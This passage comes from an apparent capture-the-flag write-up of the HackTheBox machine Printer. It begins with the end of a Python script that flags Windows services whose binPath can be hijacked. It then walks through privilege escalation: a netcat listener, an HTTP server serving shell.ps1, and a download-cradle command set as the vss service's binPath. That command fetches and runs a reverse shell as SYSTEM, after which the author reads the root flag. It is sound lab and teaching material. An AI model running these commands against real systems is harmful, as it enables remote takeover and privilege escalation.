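        (allowed if ace_type == "A" else denied).update(rights)
    return allowed - denied


def can_hijack_binpath(sddl: str, trustee: str = "SO") -> bool:
    """True if the trustee may both change the service configuration and start the service."""
    return {"SERVICE_CHANGE_CONFIG", "SERVICE_START"} <= effective_rights(sddl, trustee)


def report(sddl: str) -> list:
    """One line per trustee in the DACL, flagging those who can hijack the binPath."""
    lines = []
    for sid in dict.fromkeys(sid for _, sid, _ in parse_dacl(sddl)):  # dedupe, keep order
        flag = "HIJACKABLE" if can_hijack_binpath(sddl, sid) else "-"
        rights = " ".join(sorted(effective_rights(sddl, sid)))
        lines.append(f"{flag:10} {TRUSTEES.get(sid, sid):20} {rights}")
    return lines


if __name__ == "__main__":
    # Usage: python3 svc_acl.py "<sddl from sc.exe sdshow vss>"  or  ... | python3 svc_acl.py
    if len(sys.argv) > 1:
        sddl = sys.argv[1]
    else:
        sddl = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_SDDL
    print("\n".join(report(sddl.strip())))
```

The check is deliberately per trustee and does not expand group nesting, so if your account is in Server Operators you look at the SO line. Run it over several services (sc.exe sdshow for each) and pick one that runs as LocalSystem and is hijackable; that is the one to point at the download cradle.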

Before a service is created with a reverse shell to my machine, I have to start a netcat listener on port 1234.

┌──(eMVee@kali)-[~]
└─$ nc -lvp 1234                                                          
listening on [any] 1234 ...

Now that the netcat listener is up and running, I only need to make sure my Python web server is running and serving shell.ps1.

┌──(eMVee@kali)-[~/Documents/usefull]
└─$ sudo python3 -m http.server 80           

Everything is ready on my machine; now I can reconfigure and start the service on the target. As soon as the service starts, the reverse shell should call back.

*Evil-WinRM* PS C:\windows\temp> sc.exe config vss binPath="C:\Windows\System32\cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.26/shell.ps1')"
[SC] ChangeServiceConfig SUCCESS

*Evil-WinRM* PS C:\windows\temp> sc.exe stop vss
[SC] ControlService FAILED 1062:

The service has not been started.

*Evil-WinRM* PS C:\windows\temp> sc.exe start vss

The shell does not return after the last command. That is expected rather than a bad sign: the Service Control Manager waits for the new process to report that it has started, which cmd.exe and powershell.exe never do, so sc.exe start blocks until the SCM's start timeout (about 30 seconds) and then reports that the service failed to start. By that time the payload has long since run, so it's time to look at the netcat listener.

┌──(eMVee@kali)-[~]
└─$ nc -lvp 1234                                                          
listening on [any] 1234 ...
10.129.138.232: inverse host lookup failed: Unknown host
connect to [10.10.14.26] from (UNKNOWN) [10.129.138.232] 63477
Windows PowerShell running as user PRINTER$ on PRINTER
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>

It worked! The banner says the shell runs as PRINTER$ on PRINTER: the process was started by a service running as LocalSystem, and LocalSystem presents itself on the network as the computer account. Let's confirm who I am on the machine by running whoami;hostname;ipconfig.

PS C:\Windows\system32>whoami;hostname;ipconfig
nt authority\system
printer

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::202
   IPv6 Address. . . . . . . . . . . : dead:beef::68b4:9ce:9b4e:bf5
   Link-local IPv6 Address . . . . . : fe80::68b4:9ce:9b4e:bf5%10
   IPv4 Address. . . . . . . . . . . : 10.129.138.232
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f8ec%10
                                       10.129.0.1
PS C:\Windows\system32> 

Since the shell runs as nt authority\system, I have full control over the domain controller and can read the last flag. Before leaving, the VSS service's binPath should be restored to its original value so the box is left in working order.

PS C:\Windows\system32> cd c:\users\administrator\desktop
PS C:\users\administrator\desktop> dir


    Directory: C:\users\administrator\desktop


Mode                LastWriteTime         Length Name    
----                -------------         ------ ----    
-ar---        2/11/2022   1:44 AM             34 root.txt


PS C:\users\administrator\desktop> type root.txt
<---- FLAG ---->
PS C:\users\administrator\desktop> 

This post is licensed under CC BY 4.0 by the author.